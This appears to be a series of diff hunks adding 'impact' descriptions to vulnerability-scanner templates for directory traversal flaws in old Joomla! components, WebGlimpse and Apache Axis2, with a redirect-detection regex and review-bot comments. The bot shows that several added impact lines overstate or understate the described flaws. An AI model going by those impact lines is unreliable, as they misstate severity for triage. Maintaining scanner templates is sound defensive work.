- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4a0a00473045022014c3212369c069e74aced2e09cce019e7e3b3886dfccc0ba176b48f527d4b043022100f78dc1e0ff2cac698e269f9ef77e3fcdcd42093d0b5e83408b716fe56dc61a24:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402200bd227f253fce18d4e4dd678a4cc08f7497a6058e0f1f1b544eb1e5ba22785f7022069b1097b262d7b9c4eb7fc023566c7c5ed00eba4c26e9dbf4400cbb4b4b9cc58:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
impact: |
An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/36994 - https://www.exploit-db.com/exploits/36994
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100b6c44cb3482f8af652dee916a6c29922919394156205dd5af4613be52de7636c0220267ff1847f78cf578c20c01583d01239ad9f6e99849d7ba6c676758599057209:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100c11864aea146ea6435caa4fa55436335832385d19a76a69f9b1e4d0715768f20022064458c5f14208af4e71638abc8560be81a228ca423a9dfbcf3bed250a4e70ed8:922c64590222798bb761d5b6d8e72950
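Review bot: The added `impact` text claims more than the description supports: it says an attacker can "view, modify, or delete sensitive files", while the description just above it covers only reading arbitrary files via the DOC parameter. An impact line that overstates a read-only traversal skews triage for anyone consuming the template metadata, so I would write `An attacker can read arbitrary files on the server, potentially leading to data leakage.` The same mismatch appears in the Community Polls (com_communitypolls) and JA News (com_janews) sections, where the impact mentions remote code execution although both descriptions are read-only and the severity is medium; those should be trimmed to file disclosure as well.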


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/10943 - https://www.exploit-db.com/exploits/10943
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100ceeedcc9f9dd5600c7fc59e5441a85a74f2cf464291aaaf3aff0e3a10ff69453022100d99175c115a1b1205fa7d13ea7fc618f6db58e8b226011dfc16aa015c67b1064:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100862d6d8773869cf58419d323a548a4fe4934ffe52e1a773f8332d9c8bbb0efb60221008df16010b4804b0f237b8798cc9cdc67311efd336768a46455967917e0f4bac8:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: pikpikcu author: pikpikcu
severity: critical severity: critical
description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data.
remediation: | remediation: |
Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor. Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor.
reference: reference:
@ -59,4 +61,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a004830460221008aeb0223b59b1f43d1b5d86891682f6fdabd96f95cf747888a3ea67ea2d961a0022100ebb625cdd128e413ab38e6562e20e3b8cebdf838ac95c99355133af62512e6a0:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100da41e43897f5784bf8aa6bc1dfb5721db7618454aaf6c4182246a13b30b47a86022100ca97f29ef3b646a1cdf2f366ed582fdbfcf01a0a1c1c32ba84089c386e96edf1:922c64590222798bb761d5b6d8e72950
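Review bot: The added `impact` text understates what the description and the `critical` severity say: the description states that the default admin password lets remote attackers execute arbitrary code by uploading a crafted web service, but the impact mentions only information access and data modification. I would word it as `Successful exploitation can give an attacker administrative access to the Axis2 console and lead to arbitrary code execution on the server.` The Core Design Scriptegrator, GCalendar (com_gcalendar) and RokDownloads (com_rokdownloads) sections have the same gap: their descriptions mention including and executing local files, while the added impact lines speak only of reading or accessing files.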


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
remediation: Apply all relevant security patches and upgrades. remediation: Apply all relevant security patches and upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/11282 - https://www.exploit-db.com/exploits/11282
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a0047304502204dc0e897ea68285bef1f12bcf5834d2cf101e68c156ce46626c2a06f4985d407022100822e5427795b4bd8e13344064b70a624e097115c521a1eea3ec95769751e9e83:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402200df40dfac907595943e5906f98bfab1609a82ae9c703da4b7d0fb4ea5284c2b9022073136420b9d293e938fbbd6db582642f6c0f5836eda85d321af7e0855670c72b:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
impact: |
An attacker can exploit this vulnerability to retrieve arbitrary files from the server.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/11447 - https://www.exploit-db.com/exploits/11447
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100aecd172f508073b0b8d64784bcb420de171daff3e0a8732d29ac71488c81596f022100f9b3c9f9ed1f055178cca21e303628b061871cbbd562c6202a00d7a71ced76e5:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100801f99e10fa7f37fb9a01ff4c8eb0a4b11e2193c7e16b9c3b8a0c50ca6e4a242022077c086d823e3b8131dff5b37562334ce5fb778ead2312cb35f1b49c8fc26f8fc:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/11498 - https://www.exploit-db.com/exploits/11498
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a0046304402205591d9316f159c3eb27f1e668e68d61205761aaa141dbe50f406eb90e779fa5602207db633a31bf0a118f73eed7a38df4e593557497eafcd2199a5435cf7bf09c1d4:922c64590222798bb761d5b6d8e72950 # digest: 490a004630440220255aee4e219ee166e143888630a4e6af23c3e9b385d922dd866339bdc5d96be2022071f5391c8ceecfede26dd5441388c1f6728c9f693e05b50f408851b94f23f21a:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
An attacker can exploit this vulnerability to read arbitrary files on the server.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/11089 - https://www.exploit-db.com/exploits/11089
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a00463044022006730e9bc41d35c653ab87390772b2a4df527eb5cb3c9344d8dd31c4a2fc4f4202201c6ad57ef58398872f397ae0061c50864c955cd569b5f40316da8f32f5f15289:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022078b7a4981e20f380f36effbae103d8a364963690fa024b7b4b7f0a7731eb4faa022074cef19a8c876a25c892881ca87de44f31f764fac0538c01c8de31916e40390c:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
impact: |
An attacker can exploit this vulnerability to read arbitrary files on the server.
remediation: | remediation: |
Update to the latest version of Joomla! Component com_jashowcase to fix the directory traversal vulnerability. Update to the latest version of Joomla! Component com_jashowcase to fix the directory traversal vulnerability.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100b4abc2e6bac634509e9798e53e57b2bf8a45ca56ea0a39fd25d23d5cdffeabe102204899c1bede7831fe28b97c5b8da0cc7813575cd66ce76771af9cda761cfefc91:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100fe6e90550c4cac8714140e552ca1f8dffae1d1cf10acfda1fc2a4f1eeb04e6070220261fe0eb98e8dd254ca2bcec2deb3e7ca3c6a2bb20a00488f400c2ba4764814d:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
An attacker can exploit this vulnerability to read arbitrary files on the server.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/11088 - https://www.exploit-db.com/exploits/11088
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a0048304602210093fe6fc6aafb9aae82395913f89c943a912983b9c5963c6f58f9b5fa0209f5c9022100f3694c1e8c9202a4cf29516761dba19426b82ac5ac959b3c88540c780c35b698:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502210087ecb7ece9df8ee3e3e0fc6760a67762868e12f33b0c59f6ea3bc3ccc135a1b10220607ba4bacb84ca32dd3502bcd9973930e71855eb417a6afbb0bc270df349b136:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/11738 - https://www.exploit-db.com/exploits/11738
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100a6b583f7a3d7c073b0520d3c46a03a8381d6af0c086b1e37d29a024ce3a4736f022100cceb855f29d8dbef1c720e88cc3b9e57f023e4eeed5ff44b55a8b3c5f105e020:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100835d6327ecf3d8a79d891ab1671b58279390bedc0356214c4e0de666716a7abf022100e97639abcc162d391b35333f8165ab636eb06cff21510992ef20035e525b535f:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further exploitation.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/10942 - https://www.exploit-db.com/exploits/10942
@ -37,4 +39,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a0046304402207804d47856db88004e7d770a6b9e4905869a3bf0bb5f80c77a0db3fc02ab2e0702207ef90a49afdf02b83e9ae8900297deec4d77ec96ed9e67afa4ad99a64d3c1da5:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022004764a55873eedeef437f72de5243dc952d7938bf93ba6a44be94b1e3203d4b40221009e8e1775682357e291ce78522ca980a6d8238ef79e4e6f7cf72548f7e5bec5aa:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/10948 - https://www.exploit-db.com/exploits/10948
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022055b85a1187baab16c8619c44f333fa95a769f02d9c90cdc3b92da9af37ea765c022100ec5a4ddaf568dd08d9c499fa59981a08562d8b461b1d21bb0dc8d0479619d3b1:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100f11e7c1ef169ed3e6f170b354e5066def58df0ecb303905be2cb692bc749d50f022100bc2fa70ab2d2506cdd3c9d9a30d099823223d9a45ca34c9ebef974f8ebb45242:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/11760 - https://www.exploit-db.com/exploits/11760
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100a460424f7d97033dcbe266eb3791229f7a28b8fc530061e37d85ab04597effb002200a8c83bccd2fed2c3c8bfe321e68864093f992bda6481aa461d52b0a581836f2:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502206f23347fc78c49c9e4569468806b46c1f3a0a646c189a57c6e021e848668bc52022100d08e6c11bd627fc6eb6668dd39684ae70f76f50186063a230f92a15306a6dafe:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/11511 - https://www.exploit-db.com/exploits/11511
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100de73743eee8e218a64f00aee1fe51a44879f19bcc8b23166f946f07745624b6d02200c0609ad7c96266004a9dbd6ffe741bfeb5bfd2af21dc17c18c71b2b1deea71d:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100e30cde27274d020eca121c42cb054cc13396f5f6f7ec473d9e230814405ba65f02207f6f47e4db6c69be8b7442d0214777a30b8b37a8b5f04dd07b5e7e12bd3c3ee5:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/11814 - https://www.exploit-db.com/exploits/11814
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100bd055bd6502d4b4a22b3f99f8b75ae7fd4d249a00d2d63062d041dd7dc23747d022100f3d3a5787ce5a40534d37ac4cde47925775cf0f453c8048bad186baee48a0e4d:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402204b0e6fbebe96039eec5eb535b07e2d769ebf29d714105a0e8516df81a99580eb02200d0bce9a850e85fdf23c0adde163f704107a4b53554740537a0b640c66956d6f:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/11757 - https://www.exploit-db.com/exploits/11757
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a00463044022028b9258dfa53cbf4a25f22b1a2d54ca076fd0af9d1b91249b029d848b42cbc7002202aba1a085f6eeb87eacccc07c59515c2e66ae771bd35fee5cedb8b8aa36620a7:922c64590222798bb761d5b6d8e72950 # digest: 4a0a004730450220596ef1369c12f8e3a916e8f9e33299432b1178e9ce95fde59ddc34f77142d2f7022100e9739fb2c8ce4e2826687b0ebd6931d92e35a1568effea53043306c97259db88:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/11978 - https://www.exploit-db.com/exploits/11978
@ -37,4 +39,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a004730450220346626db9d1e2e9dc2cb7b66f34fd4785e75af4d9d5f7c6643cb298e1be166ad022100a2d43a822439066dbbd49736f821a4ffa4128015862c28991a7e243f7d511cfd:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100b57708e6b86599b708a873726d3263ce9e0d49d0e76391bb6e037a1e4937404e02205933cbacd47892558c18c7db7b4e88a0b4baec456d1c7c5491d0e2c9866f4c1c:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/12065 - https://www.exploit-db.com/exploits/12065
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100e0a4475a7c35058ce79f49d108bb180242d90cc120c530dd911afd5c66f8a9dc022076d45a27b53fd0cafb5d7adac7596d2f6b6c776544037f7117ba2e8693824aec:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100e7b04454a6bb69f264e4dd4754eee56b3022c4c5ac84e46575de2bb39dcd4a51022100956719ea0bbde43fd2079b3d401d9f87038ff2daa9c9f264755da2c0fc2a9aae:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/12058 - https://www.exploit-db.com/exploits/12058
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100db8f60e834d718a187a6affc3ddd8cb07625e1fb067e4d68b5a6f6bab98a0eb3022100b6da76ed5c5b35f5529aa45b95f8de9cc608a6c066dd69264579dc8b909dd0bb:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100e1f4f0060c68c73b81b05fa0c036c433de7e7de661c13e245b6519b209dd0686022100f724f0853fa864ea201f7b3377b3a7ae4bafc82fb0db4544f09b7092d505e11c:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/12070 - https://www.exploit-db.com/exploits/12070
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022048439f47a8b21a74b4b97fa613ad972080db3db4fe053230262199d82317045c022100eadd5c390ee4731465f6f514079896cd72f934fd9895315d895f65374aea4e72:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502204ea305e21cf6b002e44afd364c3d21030b96316a544c492604ec10f5ff96ecac022100cca452f129982dde163f273a63e54d06d5e6496eef9837cb8c2de19cbe2f74cc:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/12066 - https://www.exploit-db.com/exploits/12066
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a0046304402206a9af6404f873c9d3a57fe9df213511138f01fd29e3ea7105a802d41cf78924102205cb464a7bda81580894d76175190846c791dc1cd402a21817590737b159112e2:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022064827a2b3a8d58ef4a2a3c46803548cec0052632c4c7f8d21f18118ebd14b3c6022058eb78319f044f69ba50ef4e0d899e39e70636966010a842185bd8f281387cc8:922c64590222798bb761d5b6d8e72950


@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/12077 - https://www.exploit-db.com/exploits/12077
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100f17626c6c2fb265ab27fa0646a728898f1b0c9f3fa847a9fb431a0e39fa82e8b022100f8103d182a1847d338a89d951149a9075835a9588ed011933dfed7688f480995:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100867fd351a2a90244ed77e8046adc2180f92604b75e069d398751668b18310e9802202d41ba7430bbc6e96d855278855e1aefd1286ec09c836f3de9de918bde460e87:922c64590222798bb761d5b6d8e72950


